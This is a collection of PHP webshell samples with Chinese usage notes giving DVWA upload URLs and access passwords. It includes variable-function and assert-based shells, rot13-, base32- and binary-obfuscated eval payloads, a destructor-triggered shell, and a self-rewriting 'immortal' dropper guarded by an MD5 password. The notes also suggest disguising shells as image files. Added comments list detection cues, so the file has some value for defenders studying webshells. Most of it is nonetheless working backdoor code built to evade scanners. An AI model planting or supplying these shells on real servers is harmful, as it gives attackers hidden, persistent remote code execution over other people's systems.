<?php
// Webshell sample: the callback name comes from GET `func` and the single
// array element from POST `cmd`, so array_map() ends up calling
// $_GET[func]($_POST[cmd]). The keys `func`/`cmd` are unquoted: PHP treats
// them as undefined constants (falls back to the string with a warning on
// PHP <= 7.4, throws Error on PHP 8.0+), so the sample only runs on old
// interpreters. The documented use (func=assert) additionally relies on
// assert() evaluating a string argument as code, which PHP 8.0 removed.
// Detection cue: a request superglobal used as a callback name.
array_map($_GET[func], array($_POST[cmd]));
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php?func=assert，密码为 cmd（以 POST 提交）。注意：`$_GET[func]`、`$_POST[cmd]` 的键未加引号，PHP 会按未定义常量处理（7.2 起给出警告，8.0 起直接抛出 Error）；而且 assert() 对字符串参数的求值在 PHP 8.0 已被移除，所以该样本只在 PHP 5.x/7.x 上可用。
-----------------------------------------------------------------------------------------
<?php
// Webshell sample: a PHP "variable function" call. GET `a` names the function,
// POST `b` is passed as its single argument. Unlike the array_map sample above
// the keys are quoted, so the construct itself still parses and runs on PHP 8;
// only the documented a=assert route is dead there, because PHP 8.0 no longer
// evaluates string arguments to assert(). Treat any superglobal-as-callee
// pattern as a shell indicator regardless of the function name used.
$_GET['a']($_POST['b']);
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php?a=assert，密码为 b（以 POST 提交）。注意：`$_GET['a']($_POST['b'])` 是可变函数调用，键已加引号，语法本身在 PHP 8 下仍然成立；PHP 8.0 只是让 a=assert 这条路线失效（assert() 不再执行字符串），并不使该结构本身失效。
-----------------------------------------------------------------------------------------
<?php
// Webshell sample: array_filter() is used as an indirect call — every element of
// $arr (here only the $_REQUEST['cmd'] string) is handed to the callback named
// by $_REQUEST['func']. $_REQUEST merges GET, POST and COOKIE input, so any of
// those channels can carry the two parameters. The documented callback is
// assert, which evaluates its string argument as code only on PHP < 8.0.
$cmd = $_REQUEST['cmd'];
$arr = array($cmd);
$func = $_REQUEST['func'];
array_filter($arr, $func);
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php?func=assert，密码为 cmd。由于读取的是 $_REQUEST，func 和 cmd 通过 GET、POST 或 Cookie 传入均可；同样依赖 assert() 执行字符串参数，PHP 8.0 起失效。
array_filter()
第一个参数为数组，第二个参数为回调函数。该函数会把数组中的每个值依次作为参数传给回调函数，并根据回调的返回值决定是否保留该元素——这里只是借用"每个值都会被回调调用"这一点来间接执行回调。
-----------------------------------------------------------------------------------------
<?php
// Webshell sample: create_function('', $body) wraps $body in a
// "function __lambda_func(){ ... }" string and eval()s it (see the steps listed
// below), so $_POST['cmd'] is compiled as PHP code at definition time and
// $func() then runs it. create_function() was deprecated in PHP 7.2 and removed
// in 8.0, where this line is a fatal "Call to undefined function".
$func = create_function('', $_POST['cmd']);
$func();
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php，密码为 cmd（以 POST 提交）。注意：create_function() 在 PHP 7.2 已弃用、8.0 已移除，8.0 及之后调用会报 Call to undefined function。
create_function的实现步骤:
- 获取参数, 函数体;
- 拼凑一个"function __lambda_func (参数) { 函数体;} "的字符串;
- eval;
- 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;
- 定义一个函数名:"\000_lambda_" . count(anonymous_functions)++;
- 用新的函数名替换__lambda_func;
- 返回新的函数。
- 参考链接 https://www.t00ls.net/articles-20774.html
(可以做成图片马)
---------------------------------------------------------------------------------------------
<?php
class One{
// Webshell sample: Sn0w() rebuilds the callback name at runtime so that the
// literal "assert" never appears in the file: str_rot13('n!ff!re!nffreg')
// yields 'a!ss!er!assert', explode('!') splits it and element [3] is 'assert'.
// $x is then passed to assert() as a string, which PHP < 8.0 evaluates as code.
// Detection cue: str_rot13/explode feeding a variable-function call.
function Sn0w($x){
$c=str_rot13('n!ff!re!nffreg');
$str=explode('!',$c)[3];
$str($x);
}
}
$test=new One();
$test->Sn0w($_REQUEST['x']);    // GET/POST/COOKIE `x` reaches assert() through Sn0w()
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php，密码为 x（读取的是 $_REQUEST，GET/POST/Cookie 均可）。str_rot13('n!ff!re!nffreg') 解码为 'a!ss!er!assert'，explode 后取 [3] 即 'assert'，因此同样只在 PHP < 8.0 上可用。
(可以做成图片马)
-----------------------------------------------------------------------------------------
上传一个php文件名为miansha.php
<?php
// "Immortal shell" dropper: keeps rewriting phpinfo.php (relative path, i.e.
// the process's working directory — per the note below, next to miansha.php)
// so that deleting the dropped file does not remove the backdoor while this
// process is alive.
// ignore_user_abort(true) keeps the loop running after the client disconnects.
// set_time_limit(1) is mostly ineffective here: per the PHP manual, on
// non-Windows platforms the limit excludes time spent in system calls and
// sleeps, and this loop spends almost all of its time in file I/O and usleep().
set_time_limit(1);
ignore_user_abort(true);
$file = 'phpinfo.php';
// Base64 of the dropped shell. Decoded, it assembles the string "assert" via two
// strtr() passes over a junk string, then — only when md5($_GET['a']) equals
// e10adc3949ba59abbe56e057f20f883e (the MD5 of "123456") — passes $_POST['a']
// (after a strrev()/strrev() no-op) to assert(), i.e. evaluates it as code on
// PHP < 8.0. The md5 comparison uses loose `==`, but the digest starts with
// "e1", so no "0e..." type-juggling shortcut applies to this constant.
$shell =
"PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4=";
while(true){
file_put_contents($file,base64_decode($shell));
usleep(50);    // 50 microseconds, not 50 ms: this is effectively a busy loop
}
?>
利用方式：先访问 http://localhost/dvwa/hackable/uploads/miansha.php，它会在当前工作目录（通常即脚本所在目录）不断写出 phpinfo.php——进程存活期间即使删除该文件也会被立刻重写；
再访问 http://localhost/dvwa/hackable/uploads/phpinfo.php?a=123456：GET 参数 a 是口令，需满足 md5(a) == e10adc3949ba59abbe56e057f20f883e（即 "123456"）；要执行的代码通过 POST 参数 a 提交，最终交给 assert() 执行，因此同样只在 PHP < 8.0 上可用。
-----------------------------------------------------------------------------------------
<?php
class KUYE{
// Webshell sample: $DAXW is an unpadded base32 string decoded by SYXJ(), which
// is defined later in the file (PHP hoists unconditional top-level functions, so
// the forward call works). The decoded text begins `eval($_POS`; per the note
// below the code is taken from POST `zero`. The `/*GnSpe=u*/` wrappers are inert
// comment noise spliced around the payload to break naive signatures, and both
// `@` operators hide warnings (they do not suppress thrown Errors).
// Detection cue: a custom decoder feeding @eval inside a constructor.
public $DAXW = null;
public $LRXV = null;
function __construct(){
$this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LRXV = @SYXJ($this->DAXW);
@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
}}
new KUYE();    // the constructor runs the decoded payload as soon as the file executes
function MNWK($QSFX){
    // Base32-encode a byte string using the RFC 4648 alphabet in lower case and
    // without '=' padding. Bits are accumulated MSB-first in $acc; each complete
    // 5-bit group becomes one alphabet character, and a trailing partial group is
    // left-shifted (zero-padded) to 5 bits. Not called anywhere in this sample;
    // it is the encoder counterpart of SYXJ() below.
    $alphabet = 'abcdefghijklmnopqrstuvwxyz234567';
    $out = '';
    $acc = 0;
    $nbits = 0;
    $len = strlen($QSFX);
    for ($pos = 0; $pos < $len; $pos++) {
        $acc = ($acc << 8) | ord($QSFX[$pos]);
        $nbits += 8;
        while ($nbits >= 5) {
            $nbits -= 5;
            $out .= $alphabet[($acc >> $nbits) & 0x1f];
            $acc &= (1 << $nbits) - 1;
        }
    }
    if ($nbits > 0) {
        // Fewer than 5 bits remain: pad on the right to a full group.
        $out .= $alphabet[($acc << (5 - $nbits)) & 0x1f];
    }
    return $out;
}
function SYXJ($QSFX){
    // Decode the lower-case, unpadded base32 produced by MNWK() back into bytes.
    // Each character contributes 5 bits (a-z => 0..25, 2-7 => 26..31); every
    // complete 8-bit group is emitted and any leftover bits at the end are
    // dropped. A character outside [a-z2-7] terminates the whole script with
    // exit(1), exactly as the original does — this is what the shell above
    // relies on to turn $DAXW back into PHP source.
    $out = '';
    $acc = 0;
    $nbits = 0;
    $len = strlen($QSFX);
    for ($pos = 0; $pos < $len; $pos++) {
        $ch = $QSFX[$pos];
        if ($ch >= 'a' && $ch <= 'z') {
            $digit = ord($ch) - ord('a');
        } elseif ($ch >= '2' && $ch <= '7') {
            $digit = 24 + (int) $ch;
        } else {
            exit(1);
        }
        $acc = ($acc << 5) | $digit;
        $nbits += 5;
        while ($nbits >= 8) {
            $nbits -= 8;
            $out .= chr(($acc >> $nbits) & 0xff);
            $acc &= (1 << $nbits) - 1;
        }
    }
    return $out;
}
?>
这是 base32 编码的 payload，由 SYXJ() 解码（MNWK() 是对应的编码函数，本样本中并未调用）；解码结果以 eval($_POS 开头，代码通过 POST 参数 zero 提交。两处 @ 只压制警告，不能压制 PHP 8 抛出的 Error。利用方式 http://localhost/dvwa/hackable/uploads/nb.php，密码为 zero。
-----------------------------------------------------------------------------------------
<?php
class KUYE{
// Webshell sample: $DAXW is the payload as space-separated binary ASCII codes,
// rebuilt by BinToStr() (defined below; PHP hoists it). The codes spell out
// `eval($_POST[zero]);` — note the unquoted key `zero`, which PHP 8.0+ treats as
// an undefined constant and throws Error for inside the eval (the `@` does not
// catch exceptions), so the sample only works on older PHP. The `/*GnSpe=u*/`
// wrappers are inert comment noise around the payload.
public $DAXW = null;
public $LRXV = null;
function __construct(){
$this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
$this->LRXV = @BinToStr($this->DAXW);
@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
}}
new KUYE();    // the constructor runs the decoded payload as soon as the file executes
function BinToStr($str){
    // Turn a space-separated list of binary numbers into the characters they
    // encode. Each token is converted to hex with base_convert() and packed with
    // pack("H<n>"), <n> being the number of hex digits; an odd digit count
    // therefore fills the high nibble (e.g. '1111' -> "\xf0"), which is the
    // original's behaviour and is preserved here. Used by KUYE::__construct()
    // above to rebuild its payload string.
    $tokens = explode(' ', $str);
    $chars = array_map(
        function ($bits) {
            $hex = base_convert($bits, 2, 16);
            return pack('H' . strlen($hex), $hex);
        },
        $tokens
    );
    return implode('', $chars);
}
?>
二进制转字符串的 payload：$DAXW 经 BinToStr() 还原后为 eval($_POST[zero]);（zero 未加引号，PHP 8.0 起在 eval 内部会抛出 Error，@ 无法抑制异常，因此只在旧版本 PHP 上可用）。利用方式 http://localhost/dvwa/hackable/uploads/nb.php，密码为 zero。
-----------------------------------------------------------------------------------------
<?php
class pure
{
// Webshell sample: the payload runs from a destructor. $a (set from POST `zero`
// below) is passed to assert() as a string, which PHP 5.x/7.x evaluates as code
// when the object is destroyed — for the global $b that is at script shutdown.
// PHP 8.0+ no longer evaluates string arguments to assert(), so the path is
// dead there. Detection cue: assert()/eval() on instance state inside
// __destruct, a common trick to keep the call out of the obvious control flow.
public $a = '';
function __destruct(){
assert("$this->a");
}
}
$b = new pure;
$b->a = $_POST['zero'];    // payload string; executed by pure::__destruct() when $b is destroyed (PHP < 8.0)
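function mysubstr($string, $start = 0, $length = null) {
    // Byte-wise substr() re-implementation (filler code in this sample; nothing
    // in the file calls it). Returns up to $length bytes of $string beginning at
    // $start. A negative $start counts back from the end, a negative $length
    // drops that many bytes from the end, and a null $length means "to the end".
    // Returns '' when $start lies beyond the string or the window is empty.
    //
    // Fix: the original copied $string[$start..$end) without clamping $end to
    // the string length or $start to 0, so e.g. mysubstr('abc', 0, 10) read past
    // the end and emitted an "Uninitialized string offset" notice per extra byte,
    // and a $start below -strlen indexed the string from its tail (negative
    // offsets are legal since PHP 7.1). Both bounds are clamped here and the
    // validated window is copied with a single substr().
    $strLength = strlen($string);
    if ($length === null) {
        $length = $strLength;
    }
    $length = (int) $length;
    $start = (int) $start;
    // Negative start counts from the end; never let it precede byte 0.
    if ($start < 0) {
        $start = max(0, $strLength + $start);
    }
    if ($start > $strLength) {
        return '';
    }
    // Negative length is an offset from the end; otherwise a count from $start.
    $end = $length < 0 ? $strLength + $length : $start + $length;
    $end = min($end, $strLength);
    if ($end <= $start) {
        return '';
    }
    return substr($string, $start, $end - $start);
}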
?>
利用方式：http://localhost/dvwa/hackable/uploads/nb.php，密码为 zero（以 POST 提交）。代码不在请求处理中直接执行，而是在脚本结束、对象 $b 被销毁时经 __destruct() 交给 assert()，PHP 8.0 起 assert() 不再执行字符串参数；下方的 mysubstr() 从未被调用，只是用来混淆的填充代码。